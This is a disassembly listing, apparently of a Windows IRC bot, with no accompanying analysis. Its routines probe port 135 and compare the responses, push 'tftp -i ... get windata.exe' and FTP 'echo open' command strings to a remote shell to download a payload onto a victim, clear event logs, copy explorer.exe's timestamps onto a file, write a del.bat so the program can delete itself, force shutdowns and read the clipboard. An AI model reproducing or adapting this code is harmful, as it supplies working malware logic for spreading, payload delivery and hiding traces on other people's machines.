pop ecx
pop ecx
ja short loc_41A934
push edi
lea eax, [ebp-2008h]
push ebx
push eax
call sub_41E5F0
add esp, 0Ch
mov [ebp+8], ebx
loc_41A8F7: ; CODE XREF: seg000:0041A8BB�j
; seg000:0041A8C2�j
mov eax, [ebp-8]
inc eax
cmp eax, [ebp-4]
loc_41A8FE: ; CODE XREF: seg000:0041A894�j
mov [ebp-8], eax
jnz short loc_41A896
push edi
lea eax, [ebp-1008h]
push ebx
push eax
call sub_41E5F0
add esp, 0Ch
loc_41A914: ; CODE XREF: seg000:0041A88A�j
push ebx
push edi
lea eax, [ebp-1008h]
push eax
push ds:dword_4DB58C[esi]
call ds:dword_444064 ; recv
cmp eax, ebx
mov [ebp-4], eax
jg loc_41A88F
loc_41A934: ; CODE XREF: seg000:0041A7E3�j
; seg000:0041A8E1�j
mov ds:dword_4DB588[esi], ebx
mov esi, ds:dword_4DB58C[esi]
cmp esi, ebx
jbe short loc_41A94B
push esi
call ds:dword_444218 ; closesocket
loc_41A94B: ; CODE XREF: seg000:0041A942�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A954 proc near ; CODE XREF: sub_40274D+2FC0�p
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
xor ebx, ebx
cmp [ebp+arg_8], ebx
mov [ebp+var_4], ebx
jle short loc_41A9CF
push esi
push edi
loc_41A966: ; CODE XREF: sub_41A954+77�j
xor edi, edi
mov eax, offset dword_4DB588
loc_41A96D: ; CODE XREF: sub_41A954+28�j
cmp [eax], ebx
jz short loc_41A97E
add eax, 210h
inc edi
cmp eax, offset dword_4E1CA8
jl short loc_41A96D
loc_41A97E: ; CODE XREF: sub_41A954+1B�j
cmp edi, 31h
jz short loc_41A9CD
push [ebp+arg_0]
mov esi, edi
imul esi, 210h
lea eax, dword_4DB594[esi]
push eax
call sub_41EEC0
mov eax, [ebp+arg_4]
pop ecx
pop ecx
mov ds:dword_4DB794[esi], eax
lea eax, [ebp+var_8]
push eax
push ebx
push edi
push offset loc_41A7A3
push ebx
push ebx
mov ds:dword_4DB588[esi], 1
call ds:dword_42B03C ; CreateThread
inc [ebp+var_4]
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_8]
jl short loc_41A966
loc_41A9CD: ; CODE XREF: sub_41A954+2D�j
pop edi
pop esi
loc_41A9CF: ; CODE XREF: sub_41A954+E�j
pop ebx
leave
retn
sub_41A954 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A9D2 proc near ; CODE XREF: sub_41AA0A+127�p
; sub_41AA0A+14E�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_4]
sub edi, [ebp+arg_C]
xor esi, esi
test edi, edi
jle short loc_41AA00
loc_41A9E3: ; CODE XREF: sub_41A9D2+2C�j
push [ebp+arg_C]
mov eax, [ebp+arg_0]
push [ebp+arg_8]
add eax, esi
push eax
call sub_41F780
add esp, 0Ch
test eax, eax
jz short loc_41AA06
inc esi
cmp esi, edi
jl short loc_41A9E3
loc_41AA00: ; CODE XREF: sub_41A9D2+F�j
xor al, al
loc_41AA02: ; CODE XREF: sub_41A9D2+36�j
pop edi
pop esi
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41AA06: ; CODE XREF: sub_41A9D2+27�j
mov al, 1
jmp short loc_41AA02
sub_41A9D2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AA0A proc near ; CODE XREF: seg000:0040CCCF�p
; seg000:0040CDBB�p ...
var_2010 = byte ptr -2010h
var_200E = byte ptr -200Eh
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 2010h
call sub_41EA20
mov eax, [ebp+arg_4]
dec eax
jz short loc_41AA47
dec eax
jz short loc_41AA25
dec eax
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_41AA25: ; CODE XREF: sub_41AA0A+14�j
push 3
push 1388h
push [ebp+arg_0]
call ds:dword_44417C ; inet_addr
push eax
call sub_40BC56
add esp, 0Ch
neg eax
sbb eax, eax
and eax, 3
leave
retn
; ---------------------------------------------------------------------------
loc_41AA47: ; CODE XREF: sub_41AA0A+11�j
push esi
push edi
push 6
push 1
push 2
call ds:dword_444100 ; socket
mov esi, eax
or edi, 0FFFFFFFFh
cmp esi, edi
mov [ebp+arg_4], esi
jz loc_41AB77
push ebx
push 10h
xor ebx, ebx
lea eax, [ebp+var_10]
push ebx
push eax
call sub_41E5F0
add esp, 0Ch
push 87h
mov [ebp+var_10], 2
call ds:dword_444260 ; htons
push [ebp+arg_0]
mov [ebp+var_E], ax
call sub_4022BD
pop ecx
mov [ebp+var_C], eax
push 10h
lea eax, [ebp+var_10]
push eax
push esi
call ds:dword_4440AC ; connect
cmp eax, edi
jz loc_41AB69
push ebx
push 48h
push offset dword_443370
push esi
call ds:dword_4441A0 ; send
cmp eax, edi
jz loc_41AB69
push ebx
mov esi, 2000h
push esi
lea eax, [ebp+var_2010]
push eax
push [ebp+arg_4]
call ds:dword_444064 ; recv
cmp eax, edi
jz loc_41AB69
cmp [ebp+var_200E], 0Ch
jnz short loc_41AB69
push ebx
push 18h
push offset dword_4433BC
push [ebp+arg_4]
call ds:dword_4441A0 ; send
cmp eax, edi
jz short loc_41AB69
push ebx
push esi
lea eax, [ebp+var_2010]
push eax
push [ebp+arg_4]
call ds:dword_444064 ; recv
mov esi, eax
cmp esi, edi
jz short loc_41AB69
cmp [ebp+var_200E], 2
jnz short loc_41AB69
push 10h
push offset dword_4433D8
lea eax, [ebp+var_2010]
push esi
push eax
call sub_41A9D2
add esp, 10h
test al, al
jz short loc_41AB49
cmp esi, 12Ch
setnl bl
inc ebx
jmp short loc_41AB69
; ---------------------------------------------------------------------------
loc_41AB49: ; CODE XREF: sub_41AA0A+131�j
push 10h
push offset dword_4433EC
lea eax, [ebp+var_2010]
push esi
push eax
call sub_41A9D2
add esp, 10h
neg al
sbb eax, eax
and eax, 3
mov ebx, eax
loc_41AB69: ; CODE XREF: sub_41AA0A+9D�j
; sub_41AA0A+B4�j ...
push [ebp+arg_4]
call ds:dword_444218 ; closesocket
mov eax, ebx
pop ebx
jmp short loc_41AB79
; ---------------------------------------------------------------------------
loc_41AB77: ; CODE XREF: sub_41AA0A+55�j
xor eax, eax
loc_41AB79: ; CODE XREF: sub_41AA0A+16B�j
pop edi
pop esi
leave
retn
sub_41AA0A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AB7D proc near ; CODE XREF: sub_40274D+AEE�p
; sub_40274D+B19�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_0]
xor esi, esi
cmp edi, esi
jz short loc_41AC08
mov eax, [ebp+arg_4]
cmp eax, esi
jz short loc_41AC08
cmp [ebp+arg_8], esi
jz short loc_41AC08
cmp byte ptr [eax], 0
jz short loc_41AC08
push ebx
push edi
call sub_42996A
mov ebx, eax
test ebx, ebx
pop ecx
jz short loc_41AC03
push [ebp+arg_4]
push edi
call sub_41F090
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz short loc_41ABFC
sub eax, edi
push eax
push edi
push ebx
call sub_41E860
push [ebp+arg_8]
mov eax, ebx
sub eax, edi
mov byte ptr [eax+esi], 0
call sub_41E1C0
push eax
push [ebp+arg_8]
push ebx
call sub_41F2C0
push [ebp+arg_4]
call sub_41E1C0
add eax, esi
push eax
push ebx
call sub_41EED0
push ebx
push edi
call sub_41EEC0
add esp, 30h
mov esi, edi
loc_41ABFC: ; CODE XREF: sub_41AB7D+3C�j
push ebx
call sub_41E2A1
pop ecx
loc_41AC03: ; CODE XREF: sub_41AB7D+2B�j
mov eax, esi
pop ebx
jmp short loc_41AC0A
; ---------------------------------------------------------------------------
loc_41AC08: ; CODE XREF: sub_41AB7D+C�j
; sub_41AB7D+13�j ...
xor eax, eax
loc_41AC0A: ; CODE XREF: sub_41AB7D+89�j
pop edi
pop esi
pop ebp
retn
sub_41AB7D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AC0E proc near ; CODE XREF: sub_402472+C2�p
; seg000:00413311�p
var_7D0 = dword ptr -7D0h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 7D0h
push ebx
push esi
push edi
push 7D0h
xor ebx, ebx
lea eax, [ebp+var_7D0]
push ebx
push eax
call sub_41E5F0
mov esi, [ebp+arg_0]
push esi
call sub_41E1C0
xor edi, edi
inc edi
add esp, 10h
cmp eax, edi
jge short loc_41AC46
or eax, 0FFFFFFFFh
jmp short loc_41ACAD
; ---------------------------------------------------------------------------
loc_41AC46: ; CODE XREF: sub_41AC0E+31�j
xor ecx, ecx
cmp eax, ebx
mov [ebp+var_7D0], esi
jle short loc_41AC67
loc_41AC52: ; CODE XREF: sub_41AC0E+57�j
mov dl, [ecx+esi]
cmp dl, 0Ah
jz short loc_41AC5F
cmp dl, 0Dh
jnz short loc_41AC62
loc_41AC5F: ; CODE XREF: sub_41AC0E+4A�j
mov [ecx+esi], bl
loc_41AC62: ; CODE XREF: sub_41AC0E+4F�j
inc ecx
cmp ecx, eax
jl short loc_41AC52
loc_41AC67: ; CODE XREF: sub_41AC0E+42�j
xor edx, edx
cmp eax, ebx
jle short loc_41AC8F
loc_41AC6D: ; CODE XREF: sub_41AC0E+7F�j
cmp [edx+esi], bl
jnz short loc_41AC8A
lea ecx, [edx+esi+1]
cmp [ecx], bl
jz short loc_41AC8A
cmp edi, 1F4h
jge short loc_41AC8F
mov [ebp+edi*4+var_7D0], ecx
inc edi
loc_41AC8A: ; CODE XREF: sub_41AC0E+62�j
; sub_41AC0E+6A�j
inc edx
cmp edx, eax
jl short loc_41AC6D
loc_41AC8F: ; CODE XREF: sub_41AC0E+5D�j
; sub_41AC0E+72�j
cmp [ebp+arg_4], ebx
jz short loc_41ACAB
push 7D0h
lea eax, [ebp+var_7D0]
push eax
push [ebp+arg_4]
call sub_41F400
add esp, 0Ch
loc_41ACAB: ; CODE XREF: sub_41AC0E+84�j
mov eax, edi
loc_41ACAD: ; CODE XREF: sub_41AC0E+36�j
pop edi
pop esi
pop ebx
leave
retn
sub_41AC0E endp
; =============== S U B R O U T I N E =======================================
sub_41ACB2 proc near ; CODE XREF: sub_41B362+26�p
; seg000:0041B40A�p
arg_0 = byte ptr 4
movsx eax, [esp+arg_0]
push eax
call sub_420B27
cmp al, 61h
pop ecx
jl short loc_41ACCD
cmp al, 7Ah
jg short loc_41ACCD
movsx eax, al
sub eax, 60h
retn
; ---------------------------------------------------------------------------
loc_41ACCD: ; CODE XREF: sub_41ACB2+E�j
; sub_41ACB2+12�j
xor eax, eax
retn
sub_41ACB2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41ACD0 proc near ; CODE XREF: sub_40274D+64B5�p
; sub_40274D+74AC�p
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 100h
push esi
call ds:dword_42B01C ; RtlGetLastWin32Error
push 0
push 100h
mov esi, eax
lea eax, [ebp+var_100]
push eax
push 400h
push esi
push 0
push 1200h
call ds:dword_42B100 ; FormatMessageA
lea eax, [ebp+var_100]
loc_41AD09: ; CODE XREF: sub_41ACD0+46�j
mov cl, [eax]
cmp cl, 1Fh
jg short loc_41AD15
cmp cl, 9
jnz short loc_41AD18
loc_41AD15: ; CODE XREF: sub_41ACD0+3E�j
inc eax
jmp short loc_41AD09
; ---------------------------------------------------------------------------
loc_41AD18: ; CODE XREF: sub_41ACD0+43�j
; sub_41ACD0+5B�j ...
mov byte ptr [eax], 0
dec eax
lea ecx, [ebp+var_100]
cmp eax, ecx
jb short loc_41AD32
mov cl, [eax]
cmp cl, 2Eh
jz short loc_41AD18
cmp cl, 21h
jl short loc_41AD18
loc_41AD32: ; CODE XREF: sub_41ACD0+54�j
push esi
lea eax, [ebp+var_100]
push eax
push [ebp+arg_0]
mov esi, offset dword_4E1CA8
push offset aSErrorSD_ ; "%s Error: %s <%d>."
push 200h
push esi
call sub_41E6FE
add esp, 18h
mov eax, esi
pop esi
leave
retn
sub_41ACD0 endp
; =============== S U B R O U T I N E =======================================
sub_41AD5A proc near ; CODE XREF: sub_40274D+22AF�p
push esi
push 0
call ds:dword_44409C ; OpenClipboard
test eax, eax
jz short loc_41AD91
push 1
call ds:dword_44423C ; GetClipboardData
mov esi, eax
test esi, esi
jz short loc_41AD91
push edi
push esi
call ds:dword_42B108 ; GlobalLock
push esi
mov edi, eax
call ds:dword_42B104 ; GlobalUnlock
call ds:dword_444080 ; CloseClipboard
mov eax, edi
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_41AD91: ; CODE XREF: sub_41AD5A+B�j
; sub_41AD5A+19�j
xor eax, eax
pop esi
retn
sub_41AD5A endp
; =============== S U B R O U T I N E =======================================
sub_41AD95 proc near ; CODE XREF: sub_40274D+725F�p
arg_0 = dword ptr 4
push ebp
push esi
push edi
xor esi, esi
push esi
mov edi, offset aMirc_0 ; "mIRC"
push edi
call ds:dword_444160 ; FindWindowA
mov ebp, eax
cmp ebp, esi
jz short loc_41AE11
push ebx
push edi
push 1000h
push esi
push 4
push esi
push 0FFFFFFFFh
call ds:dword_42B114 ; CreateFileMappingA
push esi
push esi
push esi
mov edi, eax
push 0F001Fh
push edi
call ds:dword_42B110 ; MapViewOfFile
push [esp+10h+arg_0]
mov ebx, eax
push ebx
call sub_41E6A6
pop ecx
pop ecx
push esi
push 1
push 4C8h
push ebp
call ds:dword_4441CC ; SendMessageA
push esi
push 1
push 4C9h
push ebp
call ds:dword_4441CC ; SendMessageA
push ebx
call ds:dword_42B10C ; UnmapViewOfFile
push edi
call ds:dword_42B004 ; CloseHandle
xor eax, eax
inc eax
pop ebx
jmp short loc_41AE13
; ---------------------------------------------------------------------------
loc_41AE11: ; CODE XREF: sub_41AD95+16�j
xor eax, eax
loc_41AE13: ; CODE XREF: sub_41AD95+7A�j
pop edi
pop esi
pop ebp
retn
sub_41AD95 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AE17 proc near ; CODE XREF: sub_40A263+1FC�p
var_11C = byte ptr -11Ch
var_18 = byte ptr -18h
var_10 = byte ptr -10h
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 11Ch
push esi
xor esi, esi
push esi
lea eax, [ebp+var_11C]
push eax
push 104h
push esi
push offset aExplorer_exe ; "explorer.exe"
push esi
call ds:dword_444124 ; SearchPathA
test eax, eax
jz short loc_41AEB8
push ebx
push edi
push esi
mov edi, 80h
push edi
push 3
push esi
mov esi, ds:dword_42B08C
push 1
push 80000000h
lea eax, [ebp+var_11C]
push eax
call esi ; CreateFileA
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_41AEB6
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_10]
push eax
push ebx
call ds:dword_42B11C ; GetFileTime
push ebx
mov ebx, ds:dword_42B004
call ebx ; CloseHandle
push 0
push edi
push 3
push 0
push 2
push 40000000h
push [ebp+arg_0]
call esi ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_41AEB6
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_10]
push eax
push esi
call ds:dword_42B118 ; SetFileTime
push esi
call ebx ; CloseHandle
loc_41AEB6: ; CODE XREF: sub_41AE17+51�j
; sub_41AE17+87�j
pop edi
pop ebx
loc_41AEB8: ; CODE XREF: sub_41AE17+28�j
pop esi
leave
retn
sub_41AE17 endp
; =============== S U B R O U T I N E =======================================
sub_41AEBB proc near ; CODE XREF: sub_40274D+14E0�p
push 1
push offset aSeshutdownpriv ; "SeShutdownPrivilege"
call sub_41C3D9
pop ecx
pop ecx
push 50005h
push 6
call ds:dword_4441A4 ; ExitWindowsEx
neg eax
sbb eax, eax
neg eax
retn
sub_41AEBB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AEDD proc near ; CODE XREF: sub_40274D+254D�p
var_764 = byte ptr -764h
var_364 = byte ptr -364h
var_260 = byte ptr -260h
var_15C = byte ptr -15Ch
var_58 = dword ptr -58h
var_4C = dword ptr -4Ch
var_2C = dword ptr -2Ch
var_28 = word ptr -28h
var_14 = byte ptr -14h
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 764h
push esi
xor esi, esi
cmp ds:dword_43C088, esi
push edi
jz short loc_41AF01
cmp ds:dword_444274, esi
jnz short loc_41AF01
push esi
call sub_401000
pop ecx
loc_41AF01: ; CODE XREF: sub_41AEDD+13�j
; sub_41AEDD+1B�j
call sub_40AFF6
lea eax, [ebp+var_764]
push eax
push 400h
call ds:dword_42B030 ; GetTempPathA
lea eax, [ebp+var_764]
push eax
lea eax, [ebp+var_260]
push offset aSdel_bat ; "%sdel.bat"
push eax
call sub_41E6A6
add esp, 0Ch
push esi
push esi
push 2
push esi
push esi
push 40000000h
lea eax, [ebp+var_260]
push eax
call ds:dword_42B08C ; CreateFileA
mov edi, eax
cmp edi, esi
jbe loc_41B061
lea eax, [ebp+var_260]
push eax
lea eax, [ebp+var_764]
push offset a@echoOffRepeat ; "@echo off\r\n:repeat\r\ndel \"%%1\"\r\nif exist"...
push eax
call sub_41E6A6
add esp, 0Ch
push esi
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_764]
push eax
call sub_41E1C0
pop ecx
push eax
lea eax, [ebp+var_764]
push eax
push edi
call ds:dword_42B084 ; WriteFile
push edi
call ds:dword_42B004 ; CloseHandle
push 10h
lea eax, [ebp+var_14]
push esi
push eax
call sub_41E5F0
push 44h
pop edi
push edi
lea eax, [ebp+var_58]
push esi
push eax
call sub_41E5F0
add esp, 18h
mov [ebp+var_58], edi
mov edi, 104h
push edi
lea eax, [ebp+var_15C]
push eax
push esi
mov [ebp+var_4C], offset byte_42B633
mov [ebp+var_2C], 1
mov [ebp+var_28], si
call ds:dword_42B024 ; GetModuleHandleA
push eax
call ds:dword_42B00C ; GetModuleFileNameA
lea eax, [ebp+var_15C]
push eax
call ds:dword_42B050 ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jz short loc_41B009
push 80h
lea eax, [ebp+var_15C]
push eax
call ds:dword_42B04C ; SetFileAttributesA
loc_41B009: ; CODE XREF: sub_41AEDD+118�j
lea eax, [ebp+var_15C]
push eax
lea eax, [ebp+var_260]
push eax
lea eax, [ebp+var_764]
push offset aComspecCSS ; "%%comspec%% /c %s %s"
push eax
call sub_41E6A6
add esp, 10h
push edi
lea eax, [ebp+var_364]
push eax
lea eax, [ebp+var_764]
push eax
call ds:dword_42B120 ; ExpandEnvironmentStringsA
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_58]
push eax
push esi
push esi
push 4008h
push 1
push esi
push esi
lea eax, [ebp+var_364]
push eax
push esi
call ds:dword_42B008 ; CreateProcessA
loc_41B061: ; CODE XREF: sub_41AEDD+72�j
pop edi
pop esi
leave
retn
sub_41AEDD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B065 proc near ; CODE XREF: sub_40274D+6E5F�p
var_294 = byte ptr -294h
var_94 = dword ptr -94h
var_84 = dword ptr -84h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 294h
push edi
push 94h
xor edi, edi
lea eax, [ebp+var_94]
push edi
push eax
call sub_41E5F0
add esp, 0Ch
lea eax, [ebp+var_94]
push eax
mov [ebp+var_94], 94h
call ds:dword_42B064 ; GetVersionExA
cmp [ebp+var_84], 2
jnz short loc_41B0FB
push [ebp+arg_10]
push [ebp+arg_C]
call ds:dword_444248 ; OpenEventLogA
push edi
push eax
call ds:dword_44411C ; ClearEventLogA
test eax, eax
jz short loc_41B0ED
push [ebp+arg_10]
push offset dword_437AD8
loc_41B0C6: ; CODE XREF: sub_41B065+94�j
lea eax, [ebp+var_294]
push eax
call sub_41E6A6
push edi
push [ebp+arg_8]
lea eax, [ebp+var_294]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40123B
add esp, 20h
jmp short loc_41B125
; ---------------------------------------------------------------------------
loc_41B0ED: ; CODE XREF: sub_41B065+57�j
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset unk_437AB0
jmp short loc_41B0C6
; ---------------------------------------------------------------------------
loc_41B0FB: ; CODE XREF: sub_41B065+3F�j
lea eax, [ebp+var_294]
push offset unk_437A80
push eax
call sub_41E6A6
push edi
push [ebp+arg_8]
lea eax, [ebp+var_294]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40123B
add esp, 1Ch
loc_41B125: ; CODE XREF: sub_41B065+86�j
pop edi
leave
retn
sub_41B065 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B128 proc near ; CODE XREF: seg000:0040CEF6�p
; sub_40D7FE+434�p ...
var_5A4 = byte ptr -5A4h
var_1A4 = byte ptr -1A4h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_BC = dword ptr 0C4h
push ebp
mov ebp, esp
sub esp, 5A4h
push esi
push edi
push 10h
xor edi, edi
lea eax, [ebp+var_14]
push edi
push eax
call sub_41E5F0
add esp, 0Ch
lea eax, [ebp+arg_4]
push eax
mov [ebp+var_14], 2
call ds:dword_44417C ; inet_addr
push [ebp+arg_BC]
mov [ebp+var_10], eax
call ds:dword_444260 ; htons
push edi
push 1
push 2
mov [ebp+var_12], ax
call ds:dword_444100 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
mov [ebp+var_4], esi
jz short loc_41B18E
push 10h
lea eax, [ebp+var_14]
push eax
push esi
call ds:dword_4440AC ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_41B195
loc_41B18E: ; CODE XREF: sub_41B128+52�j
xor al, al
jmp loc_41B247
; ---------------------------------------------------------------------------
loc_41B195: ; CODE XREF: sub_41B128+64�j
push ebx
push edi
mov ebx, 400h
push ebx
lea eax, [ebp+var_5A4]
push eax
push esi
call ds:dword_444064 ; recv
mov esi, offset aWindata_exe ; "windata.exe"
push esi
push esi
push [ebp+arg_0]
call sub_4023C9
pop ecx
push eax
push offset aTftpISGetSS ; "tftp -i %s get %s &%s\r\n"
mov edi, 190h
lea eax, [ebp+var_1A4]
push edi
push eax
call sub_41E6FE
movzx eax, word ptr ds:dword_4D1FE4
add esp, 18h
push esi
push esi
push eax
push [ebp+arg_0]
call sub_4023C9
pop ecx
push eax
push offset aEchoOpenSDOE_0 ; "echo open %s %d > o&echo user 1 1 >> o "...
lea eax, [ebp+var_1A4]
push edi
push eax
call sub_41E6FE
add esp, 1Ch
lea eax, [ebp+var_1A4]
push 0
push eax
call sub_41E1C0
pop ecx
push eax
lea eax, [ebp+var_1A4]
push eax
push [ebp+var_4]
call ds:dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_41B228
xor al, al
jmp short loc_41B246
; ---------------------------------------------------------------------------
loc_41B228: ; CODE XREF: sub_41B128+FA�j
push 0
push ebx
lea eax, [ebp+var_5A4]
push eax
push [ebp+var_4]
call ds:dword_444064 ; recv
push [ebp+var_4]
call ds:dword_444218 ; closesocket
mov al, 1
loc_41B246: ; CODE XREF: sub_41B128+FE�j
pop ebx
loc_41B247: ; CODE XREF: sub_41B128+68�j
pop edi
pop esi
leave
retn
sub_41B128 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=6Ch
sub_41B24B proc near ; CODE XREF: sub_40274D+5347�p
var_1C0 = byte ptr -1C0h
var_15C = byte ptr -15Ch
var_F8 = byte ptr -0F8h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_84 = dword ptr -84h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
lea ebp, [esp-6Ch]
sub esp, 1C0h
lea eax, [ebp+6Ch+var_94]
push eax
mov [ebp+6Ch+var_94], 94h
call ds:dword_42B064 ; GetVersionExA
cmp [ebp+6Ch+var_90], 4
jnz short loc_41B283
cmp [ebp+6Ch+var_8C], 0
jnz loc_41B310
xor eax, eax
inc eax
cmp [ebp+6Ch+var_84], eax
jz loc_41B30B
loc_41B283: ; CODE XREF: sub_41B24B+20�j
; sub_41B24B+CF�j
push esi
push edi
push offset aNetapi32_dll ; "netapi32.dll"
call ds:dword_42B018 ; LoadLibraryA
mov esi, eax
push offset aNetmessagebuff ; "NetMessageBufferSend"
push esi
call ds:dword_42B020 ; GetProcAddress
push 32h
push [ebp+6Ch+arg_0]
mov edi, eax
lea eax, [ebp+6Ch+var_1C0]
push eax
call sub_4204DD
push 32h
push [ebp+6Ch+arg_4]
lea eax, [ebp+6Ch+var_15C]
push eax
call sub_4204DD
push 32h
push [ebp+6Ch+arg_8]
lea eax, [ebp+6Ch+var_F8]
push eax
call sub_4204DD
lea eax, [ebp+6Ch+var_F8]
push eax
call sub_4206A3
shl eax, 1
push eax
lea eax, [ebp+6Ch+var_F8]
push eax
lea eax, [ebp+6Ch+var_15C]
push eax
lea eax, [ebp+6Ch+var_1C0]
push eax
push 0
call edi ; GetProcessHeap
add esp, 3Ch
push esi
mov edi, eax
call ds:dword_42B0F8 ; FreeLibrary
mov eax, edi
pop edi
pop esi
loc_41B30B: ; CODE XREF: sub_41B24B+32�j
; sub_41B24B+D8�j
add ebp, 6Ch
leave
retn
; ---------------------------------------------------------------------------
loc_41B310: ; CODE XREF: sub_41B24B+26�j
cmp [ebp+6Ch+var_8C], 0Ah
jz short loc_41B320
cmp [ebp+6Ch+var_8C], 5Ah
jnz loc_41B283
loc_41B320: ; CODE XREF: sub_41B24B+C9�j
xor eax, eax
inc eax
jmp short loc_41B30B
sub_41B24B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B325 proc near ; CODE XREF: seg000:0040FCE7�p
; seg000:004102E3�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
call ds:dword_42B038 ; GetTickCount
push eax
call sub_41ECD4
pop ecx
call sub_41ECDE
mov esi, [ebp+arg_0]
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
fild [ebp+var_4]
sub eax, esi
mov [ebp+arg_4], eax
fimul [ebp+arg_4]
fmul ds:dbl_437B70
call sub_41FE38
sub esi, eax
mov eax, esi
pop esi
leave
retn
sub_41B325 endp
; =============== S U B R O U T I N E =======================================
sub_41B362 proc near ; CODE XREF: seg000:0041B3D2�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_4]
push esi
push edi
mov edi, [esp+8+arg_8]
mov ecx, 1F4h
rep stosd
lea edi, [eax-1]
xor esi, esi
test edi, edi
jl short loc_41B39C
push ebx
mov ebx, edi
loc_41B37F: ; CODE XREF: sub_41B362+37�j
mov eax, [esp+0Ch+arg_0]
movsx eax, byte ptr [esi+eax]
push eax
call sub_41ACB2
pop ecx
mov ecx, [esp+0Ch+arg_8]
inc esi
mov [ecx+eax*4], ebx
dec ebx
cmp esi, edi
jle short loc_41B37F
pop ebx
loc_41B39C: ; CODE XREF: sub_41B362+18�j
pop edi
pop esi
retn
sub_41B362 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, 100Ch
call sub_41EA20
push ebx
push esi
push edi
push dword ptr [ebp+8]
call sub_41E1C0
push dword ptr [ebp+0Ch]
mov [ebp-4], eax
call sub_41E1C0
mov esi, eax
lea eax, [ebp-100Ch]
push eax
push esi
push dword ptr [ebp+0Ch]
mov [ebp-0Ch], esi
call sub_41B362
add esp, 14h
dec esi
mov edi, esi
jmp short loc_41B453
; ---------------------------------------------------------------------------
loc_41B3DF: ; CODE XREF: seg000:0041B455�j
mov eax, [ebp+0Ch]
movsx eax, byte ptr [esi+eax]
push eax
call sub_420B27
mov ebx, eax
mov eax, [ebp+8]
movsx eax, byte ptr [edi+eax]
push eax
call sub_420B27
cmp eax, ebx
pop ecx
pop ecx
jz short loc_41B451
loc_41B401: ; CODE XREF: seg000:0041B44F�j
mov ebx, [ebp+8]
xor eax, eax
mov al, [edi+ebx]
push eax
call sub_41ACB2
mov edx, [ebp-0Ch]
mov eax, [ebp+eax*4-100Ch]
pop ecx
mov ecx, edx
sub ecx, esi
cmp ecx, eax
jle short loc_41B424
mov eax, ecx
loc_41B424: ; CODE XREF: seg000:0041B420�j
add edi, eax
cmp edi, [ebp-4]
jge short loc_41B461
mov eax, [ebp+0Ch]
lea esi, [edx-1]
movsx eax, byte ptr [esi+eax]
push eax
call sub_420B27
movsx ecx, byte ptr [edi+ebx]
push ecx
mov [ebp-8], eax
call sub_420B27
pop ecx
pop ecx
mov ecx, [ebp-8]
cmp eax, ecx
jnz short loc_41B401
loc_41B451: ; CODE XREF: seg000:0041B3FF�j
dec edi
dec esi
loc_41B453: ; CODE XREF: seg000:0041B3DD�j
